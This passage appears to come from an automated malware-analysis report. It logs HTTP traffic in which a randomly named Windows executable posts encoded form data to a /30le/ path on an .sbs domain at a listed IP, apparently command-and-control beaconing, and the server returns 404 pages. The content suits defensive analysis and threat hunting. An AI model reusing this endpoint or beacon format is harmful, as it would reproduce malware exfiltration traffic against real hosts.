Connection: close
Content-Length: 220
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Origin: http://www.nieuws-july202488.sbs
Referer: http://www.nieuws-july202488.sbs/30le/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSdgj9liC1ZRVlLzlEgGciJZQY1555vILxVX1aOzpr9PRoUKSkg==
Jan 11, 2025 04:17:00.769330025 CET | 1236 | IN | HTTP/1.1 404 Not Found
keep-alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: Sat, 11 Jan 2025 03:17:00 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
connection: close
                                                            Data Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                            Data Ascii: 1353ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                            Jan 11, 2025 04:17:00.769350052 CET | 1236 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                            Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                            Jan 11, 2025 04:17:00.769428968 CET | 448 | IN | Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                            Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                            Jan 11, 2025 04:17:00.769442081 CET | 1236 | IN | Data Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                            Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                            Jan 11, 2025 04:17:00.769479036 CET | 1083 | IN | Data Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                            Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.7 | 49979 | 162.0.215.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:02.725404024 CET | 855 | OUT | POST /30le/ HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.nieuws-july202488.sbs
                                                            Referer: http://www.nieuws-july202488.sbs/30le/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 30 49 6a 52 7a 30 50 58 6d 2b 4d 6c 6c 35 73 5a 55 52 75 41 42 62 66 36 34 46 52 50 34 61 76 56 2f 73 4f 70 72 68 2b 41 43 33 64 55 6e 47 4e 45 2b 67 68 36 61 65 6e 4d 49 76 38 64 62 6f 31 32 52 4e 66 59 45 36 6b 75 70 34 49 59 74 5a 76 6e 69 44 52 6c 31 39 67 45 67 62 79 47 63 72 32 36 45 58 51 70 48 32 75 46 48 30 4c 61 6f 4e 34 4c 52 31 73 64 57 53 54 2f 67 77 6c 31 4f 76 77 34 46 42 74 64 79 48 65 43 4b 77 38 59 68 72 63 33 64 50 75 4a 56 2b 7a 55 54 74 58 73 48 49 30 4b 71 37 6c 47 72 57 79 51 50 44 4c 71 69 57 79 49 4d 6d 57 64 42 5a 31 76 61 5a 32 4d 34 3d
                                                            Data Ascii: MHJ0GXi=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz0IjRz0PXm+Mll5sZURuABbf64FRP4avV/sOprh+AC3dUnGNE+gh6aenMIv8dbo12RNfYE6kup4IYtZvniDRl19gEgbyGcr26EXQpH2uFH0LaoN4LR1sdWST/gwl1Ovw4FBtdyHeCKw8Yhrc3dPuJV+zUTtXsHI0Kq7lGrWyQPDLqiWyIMmWdBZ1vaZ2M4=
                                                            Jan 11, 2025 04:17:03.331998110 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Sat, 11 Jan 2025 03:17:03 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                            Data Ascii: 1353ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                            Jan 11, 2025 04:17:03.332042933 CET | 224 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                            Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZe
                                                            Jan 11, 2025 04:17:03.332119942 CET | 1236 | IN | Data Raw: d5 07 c6 f5 72 19 bf f2 1f fd ca be bd 5e 6f 3e 18 7a 3d 12 72 73 4f ef 97 dd 08 e7 e5 c2 fd ac fd 0f 00 74 13 af 3f 53 fc 1b d5 0f 9c cf 64 02 44 fb bf 70 3e 3f ba 8d ba 88 ff e4 98 95 f9 70 71 23 70 9e fa 7f b1 cc d2 1d 11 5f c2 0d bd d4 5a 64
                                                            Data Ascii: r^o>z=rsOt?SdDp>?pq#p_ZdN/d%LPZpz4?2CYVvjCmQK!K4.fx:2ux1z2;|gYfuL>Ca!;@IMu.>%*L#]
                                                            Jan 11, 2025 04:17:03.332158089 CET | 1236 | IN | Data Raw: b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5 29 65 9a 98 31 e6 3e f1 71 5a f5 17
                                                            Data Ascii: >*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGfp8R9
                                                            Jan 11, 2025 04:17:03.332192898 CET | 1236 | IN | Data Raw: b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 5c ae 68 0e 59 fa 67 31 2e 4c 8d 6c a2 76 74 4c 77 49 cd ae
                                                            Data Ascii: vV-NZ).RiAw2OjTI G_57d,NW>}+\hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y*=I
                                                            Jan 11, 2025 04:17:03.332230091 CET | 71 | IN | Data Raw: e2 dd 37 e6 7b a1 f1 bf ff 0b 94 82 d0 d1 e0 9a da 07 2a 7b 56 9b 79 a3 90 f7 f8 7a 84 af b5 f6 08 3f 07 b2 c7 cb 7b b9 6f bf fd 0f 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 d7 29 ca 2a 8d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 7{*{Vyz?{oA)*'0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.7 | 49980 | 162.0.215.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:05.309784889 CET | 1868 | OUT | POST /30le/ HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.nieuws-july202488.sbs
                                                            Referer: http://www.nieuws-july202488.sbs/30le/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 38 49 67 69 4c 30 50 32 6d 2b 4e 6c 6c 35 71 70 55 63 75 41 42 47 66 36 77 42 52 50 45 73 76 58 33 73 50 4b 6a 68 79 6c 69 33 47 45 6e 47 53 55 2b 68 6c 36 61 78 6e 4e 34 52 38 64 4c 6f 31 32 52 4e 66 62 63 36 30 50 70 34 4f 59 74 65 6f 6e 69 50 56 6c 31 46 67 45 6f 6c 79 41 41 37 32 4b 6b 58 51 4a 58 32 39 6e 2f 30 55 4b 6f 31 37 4c 52 39 73 64 62 49 54 2f 73 43 6c 33 75 4a 77 36 6c 42 75 36 66 65 4f 51 53 79 6d 59 56 67 41 47 31 70 6a 6f 46 74 31 57 65 4f 66 50 6e 33 35 34 43 2f 74 33 62 33 77 55 65 46 4c 70 71 61 31 71 59 43 58 4c 38 39 67 50 69 52 6b 4d 58 2b 57 43 38 48 6d 76 4c 67 36 70 5a 32 66 66 71 53 72 6e 78 75 53 65 45 74 4f 73 79 31 56 34 55 64 2f 75 43 6d 79 41 7a 67 52 56 76 36 30 56 31 55 33 33 39 55 2b 61 78 69 4f 58 42 42 4a 59 55 46 56 46 4f 53 4e 74 71 57 6b 68 64 31 6a 77 49 39 6a 4a 44 33 77 58 4d 4b 6c 67 4a 53 2b 43 52 56 78 4c [TRUNCATED]
                                                            Data Ascii: MHJ0GXi= [TRUNCATED]
                                                            Jan 11, 2025 04:17:05.895186901 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            content-encoding: gzip
                                                            vary: Accept-Encoding
                                                            date: Sat, 11 Jan 2025 03:17:05 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 31 33 35 44 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                            Data Ascii: 135DZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                            Jan 11, 2025 04:17:05.895307064 CET | 1236 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                            Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                            Jan 11, 2025 04:17:05.895327091 CET | 448 | IN | Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                            Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                            Jan 11, 2025 04:17:05.895339012 CET | 1236 | IN | Data Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                            Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                            Jan 11, 2025 04:17:05.895351887 CET | 1078 | IN | Data Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                            Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.7 | 49981 | 162.0.215.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:08.048028946 CET | 561 | OUT | GET /30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.nieuws-july202488.sbs
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:08.515913010 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            keep-alive: timeout=5, max=100
                                                            content-type: text/html
                                                            transfer-encoding: chunked
                                                            date: Sat, 11 Jan 2025 03:17:08 GMT
                                                            server: LiteSpeed
                                                            x-turbo-charged-by: LiteSpeed
                                                            connection: close
                                                            Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                            Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                            Jan 11, 2025 04:17:08.515969038 CET | 224 | IN | Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                            Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                            Jan 11, 2025 04:17:08.516007900 CET | 1236 | IN | Data Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20
                                                            Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
                                                            Jan 11, 2025 04:17:08.516045094 CET | 1236 | IN | Data Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                            Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
                                                            Jan 11, 2025 04:17:08.516079903 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                            Jan 11, 2025 04:17:08.516114950 CET | 672 | IN | Data Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48
